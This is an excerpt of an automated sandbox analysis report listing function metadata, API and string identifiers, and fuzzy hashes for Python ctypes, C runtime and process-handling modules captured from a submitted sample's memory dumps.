                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)$xrw
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)$xwc
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F63A00: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8B9F63A4B
                                                  • PyUnicode_FromStringAndSize.PYTHON311 ref: 00007FF8B9F64090
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FromSizeStringUnicode___stdio_common_vsprintf
                                                  • String ID: :%x$ctypes object structure too deep
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditErr_StringSys_
                                                  • String ID: abstract class$ctypes.cdata
                                                  APIs
                                                  Strings
                                                  • bytes or integer address expected instead of %s instance, xrefs: 00007FF8B9F68AEB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Long$Bytes_Long_MaskStringUnsigned
                                                  • String ID: bytes or integer address expected instead of %s instance
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_LongLong_MaskStringUnicode_Unsigned
                                                  • String ID: function name must be string, bytes object or integer
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditDeallocFromLongLong_Sys_
                                                  • String ID: ctypes.get_errno
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditDeallocFromLongLong_Sys_
                                                  • String ID: ctypes.get_last_error
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastOpenProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 919517065-2746090705
                                                  • Opcode ID: 7c35501a303b2777f004bc09f587717ea65ef8e0d80bfceead6ee05c0336e9e1
                                                  • Instruction ID: a523a5ab62dacb10ac720b3415f40dde56d5bff3398fc4406a8c18cc43d58b50
                                                  • Opcode Fuzzy Hash: 7c35501a303b2777f004bc09f587717ea65ef8e0d80bfceead6ee05c0336e9e1
                                                  • Instruction Fuzzy Hash: E3F04F11F195C682EF698F6A689803956D5AFA87F4F441034DB0E86794EE1CE8978700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditCallObject_ParseSys_Tuplememset
                                                  • String ID: O&O!$ctypes.call_function
                                                  • API String ID: 886791329-313584727
                                                  • Opcode ID: 17adec98670e9f6cdebf84fa662457cca95efbc4de64805adf32e68e07ce2538
                                                  • Instruction ID: 1e0a1141133c6a50f72e6f2b33db6c7f660d25812d5358d4d5346ec38992bc03
                                                  • Opcode Fuzzy Hash: 17adec98670e9f6cdebf84fa662457cca95efbc4de64805adf32e68e07ce2538
                                                  • Instruction Fuzzy Hash: FF013972A18B8792EB508F15E8847AA67A4FB487E5F401136DA4D43724DF7CE145D710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditCallObject_ParseSys_Tuplememset
                                                  • String ID: O&O!$ctypes.call_function
                                                  • API String ID: 886791329-313584727
                                                  • Opcode ID: 956f25cfe963604cb9d4e30e000f0088442d622793c0436951a4906829bed983
                                                  • Instruction ID: 599dd2d3dfa26e61f875f645cbf8e09c3fb24fb98a1a5bfeefde87ce13a0c665
                                                  • Opcode Fuzzy Hash: 956f25cfe963604cb9d4e30e000f0088442d622793c0436951a4906829bed983
                                                  • Instruction Fuzzy Hash: A3011B72A1CF8792E7508F19E8847A967A4FB487E6F401136EA4C47764DF7CE145C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_String
                                                  • String ID: _type_ must be a type$_type_ must have storage info
                                                  • API String ID: 1259552197-214983684
                                                  • Opcode ID: f9c93959e9af95d6c9b4c14054f54ac853c0c588ad50044a4a2a3fec31618313
                                                  • Instruction ID: 248004d11a629550a86b7866b16a88fbace45ebb405318a0bddb0ccc721550d5
                                                  • Opcode Fuzzy Hash: f9c93959e9af95d6c9b4c14054f54ac853c0c588ad50044a4a2a3fec31618313
                                                  • Instruction Fuzzy Hash: E301FBB5F19B8285EE549F2DD4402B822A0AF4ABF2F54A131DB0D923A5DF7CA484C301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: cannot be converted to pointer
                                                  • API String ID: 1450464846-3065012988
                                                  • Opcode ID: ba69f6be1e03f64db6319ffa1c479f40c92e1bf7f208d3a0c57e532b4c3c8d90
                                                  • Instruction ID: 25aee3dce1e9d636eda6a49f36fb0d98145df888ed22e6d369dea0764e48a182
                                                  • Opcode Fuzzy Hash: ba69f6be1e03f64db6319ffa1c479f40c92e1bf7f208d3a0c57e532b4c3c8d90
                                                  • Instruction Fuzzy Hash: 0A01FF62A09B8695EA548F29F85433827A1EF49FE6F18A031DB5D47354DE2CE494C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Callable_CheckDeallocErr_String
                                                  • String ID: the errcheck attribute must be callable
                                                  • API String ID: 3907376375-3049503998
                                                  • Opcode ID: 40a5e4c9387a9eacadc56f8a50b5cb35d6fcf5bb7bd3e5eec0ef331718cf67ff
                                                  • Instruction ID: 3355ef21b50d20106e24a9c7c459dd61e7b8b6f244909cfbc1455bdb3a3f990b
                                                  • Opcode Fuzzy Hash: 40a5e4c9387a9eacadc56f8a50b5cb35d6fcf5bb7bd3e5eec0ef331718cf67ff
                                                  • Instruction Fuzzy Hash: 28F04422A0CEC281EE998FBDF95413823A0BF89BF6F589131CB5D46354DE2CD495C300
                                                  APIs
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
                                                  • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24266E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abortterminate
                                                  • String ID: MOC$RCC$csm
                                                  • API String ID: 661698970-2671469338
                                                  • Opcode ID: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
                                                  • Instruction ID: 720875cf72d265a6042c164f850b8f6405881dbde24945ceb9ba7e24f768d97f
                                                  • Opcode Fuzzy Hash: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
                                                  • Instruction Fuzzy Hash: D2F04932918607D2E750AF6AE28116836A5FB88FC4F0991B1DF4806296CF7CE4A0DB41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Long_OccurredStringVoid
                                                  • String ID: integer expected
                                                  • API String ID: 1621529885-2140524511
                                                  • Opcode ID: 7b49f154c6c6e067b1201768131b658a8a7bf5851dad34e5bb971b0d47541ff1
                                                  • Instruction ID: 8b80de73f574404504a23a8c9ecce0375d37e1d99a7452c35f7b613932026b30
                                                  • Opcode Fuzzy Hash: 7b49f154c6c6e067b1201768131b658a8a7bf5851dad34e5bb971b0d47541ff1
                                                  • Instruction Fuzzy Hash: A7F03A25B08BC691EE448F5AE58427967A1EF4AFF6F18A030DB0E4B365DE2CD498C300
                                                  APIs
                                                  • PyLong_AsUnsignedLongLong.PYTHON311(?,?,00000006,00007FF8B90A0080), ref: 00007FF8B90A1219
                                                  • PyErr_Occurred.PYTHON311(?,?,00000006,00007FF8B90A0080), ref: 00007FF8B90A1222
                                                  • PyErr_SetString.PYTHON311(?,?,00000006,00007FF8B90A0080), ref: 00007FF8B90A5AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072699078.00007FF8B9091000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8B9090000, based on PE: true
                                                  • Associated: 00000002.00000002.2072666393.00007FF8B9090000.00000002.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90A8000.00000002.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072810626.00007FF8B90B4000.00000004.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9090000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_Long$Long_OccurredStringUnsigned
                                                  • String ID: Value too large for uint32_t type
                                                  • API String ID: 944333170-1712686559
                                                  • Opcode ID: 9bd35320a0081bffd2fdba9bc7a0431c058ebd7055e0bc2aeb8b7046bc9156ca
                                                  • Instruction ID: 0eb8baa7ae5d391c9bc979e2792e3977eeeb9c6526923214d51bcfd03ad31451
                                                  • Opcode Fuzzy Hash: 9bd35320a0081bffd2fdba9bc7a0431c058ebd7055e0bc2aeb8b7046bc9156ca
                                                  • Instruction Fuzzy Hash: 42F01C71B0CA8785EF505F6DF4841792364AF58BE8F189434DB0E8A365DE3CE4AA8780
                                                  APIs
                                                  Strings
                                                  • second item in _fields_ tuple (index %zd) must be a C type, xrefs: 00007FF8B9F6817E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_FormatFreeMem_
                                                  • String ID: second item in _fields_ tuple (index %zd) must be a C type
                                                  • API String ID: 3237669406-2717732800
                                                  • Opcode ID: 6c5e0c61733740b2a0fd8058cc8b9152b4a417e0ab55625c6ded04eac5423bae
                                                  • Instruction ID: 543749af3d3939e4a0385413f5e3bbadc4ff790acfb8fca848f9604334d2048f
                                                  • Opcode Fuzzy Hash: 6c5e0c61733740b2a0fd8058cc8b9152b4a417e0ab55625c6ded04eac5423bae
                                                  • Instruction Fuzzy Hash: 8FE04C65A0CFC392FA949F2DE8540382760AF86FF6B141231DA1E527B0DE7CA549D205
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID:
                                                  • API String ID: 2943138195-0
                                                  • Opcode ID: 648336d396e82ff845145f22116d02ab074a94aa94e21a1e761fb2f6b175ab31
                                                  • Instruction ID: fa670d6b7e2460978671fe916f83814e08fafcdd78a511f4514500fa4f2735d0
                                                  • Opcode Fuzzy Hash: 648336d396e82ff845145f22116d02ab074a94aa94e21a1e761fb2f6b175ab31
                                                  • Instruction Fuzzy Hash: 8F916632E18A9399FB118B69D8403BC3BB1BB04B88F5481B6DF4D27695DF7DA845E340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+$NameName::
                                                  • String ID:
                                                  • API String ID: 168861036-0
                                                  • Opcode ID: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
                                                  • Instruction ID: 1cd373dbd38b0f7c56bf0a149ba1c84216894864d1f1b1e7bdb3d63d6ddb80e0
                                                  • Opcode Fuzzy Hash: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
                                                  • Instruction Fuzzy Hash: 30514472A28A5689FB118F29EA417BC37A1BB44F88F5884B1DF5E07795DF39E440E700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+$Replicator::operator[]
                                                  • String ID:
                                                  • API String ID: 3863519203-0
                                                  • Opcode ID: 59a8e1a8bea4fa0d3053ac7b282f3cf586ef513a0d49dabd13085b0ba4a6c699
                                                  • Instruction ID: d9639c8c6d767f2fd53c9d5f45070cd4e3a18faafae50e43425925752dbabda2
                                                  • Opcode Fuzzy Hash: 59a8e1a8bea4fa0d3053ac7b282f3cf586ef513a0d49dabd13085b0ba4a6c699
                                                  • Instruction Fuzzy Hash: 5E411072A08B9689EB01CF68D8413AC3BB0BB49B88F548076DF4D67799DF78E841D750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$DeallocFreeMallocmemcpy
                                                  • String ID:
                                                  • API String ID: 1346496523-0
                                                  • Opcode ID: 8c08fdf6c3f6743b583b35e04fc598e2fc29906b9b2b5698a8cb90300fdd1926
                                                  • Instruction ID: ff82498dc8d87c83796d8c6481478bbc68d93b9e44c5cd9020139c2790cafaa2
                                                  • Opcode Fuzzy Hash: 8c08fdf6c3f6743b583b35e04fc598e2fc29906b9b2b5698a8cb90300fdd1926
                                                  • Instruction Fuzzy Hash: F5215B62A1DB8282EB589F69E84003827A0FF49FE6B185535DB0D07754EF3CE461C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Descr_Dict_ItemString
                                                  • String ID:
                                                  • API String ID: 975051370-0
                                                  • Opcode ID: cbfa8e76cbb37faade4b4752a761ba53e7deef88f0e4638b9d9c9114bc06fd37
                                                  • Instruction ID: 4bb4e3fa2a3bf0d196c9bd0f3666b8f746771ce727af8b00d4d1e3e3306e1513
                                                  • Opcode Fuzzy Hash: cbfa8e76cbb37faade4b4752a761ba53e7deef88f0e4638b9d9c9114bc06fd37
                                                  • Instruction Fuzzy Hash: 60114C21A0DB8285EE549F2AE95033966A0EF4ABF2F086130DF4E43B95DF3CD491C300
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F622B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B9F62301
                                                  • PyWeakref_NewProxy.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F6163E
                                                  • PyDict_SetItem.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F6165F
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F66A71
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F66A80
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$CallDict_ItemMakeObject_ProxyWeakref_
                                                  • String ID:
                                                  • API String ID: 1512266493-0
                                                  • Opcode ID: edfa2a0c717579e9911386e870fa1321e468c4d2dd0d8facd930d0c933b2ac38
                                                  • Instruction ID: f6fa5ef99abaed462bd1273c119c72226c661bbc9498ffe5b75854219fe23717
                                                  • Opcode Fuzzy Hash: edfa2a0c717579e9911386e870fa1321e468c4d2dd0d8facd930d0c933b2ac38
                                                  • Instruction Fuzzy Hash: 42114C26A09BC285EA548F2AE8400797BA4FF4ABE6B1C9135DF5E077A5CE3CE451C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocFreeMem_Thread_free_lock
                                                  • String ID:
                                                  • API String ID: 2783890233-0
                                                  • Opcode ID: 5aeb15387b95166676224402c5d5f2316a130d4eb9e2bcf5365a9fe41ac904a5
                                                  • Instruction ID: 5da973be86538b23f33de9fad92c686fde847ee6a4c2606d2ee50e19b143c1bd
                                                  • Opcode Fuzzy Hash: 5aeb15387b95166676224402c5d5f2316a130d4eb9e2bcf5365a9fe41ac904a5
                                                  • Instruction Fuzzy Hash: 6A114C32A0D68295EE1A9F69D99437C3375AF85B85F084031CB5E47693CF2CD85AC310
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ErrorLastOpenProcess
                                                  • String ID:
                                                  • API String ID: 3379443537-0
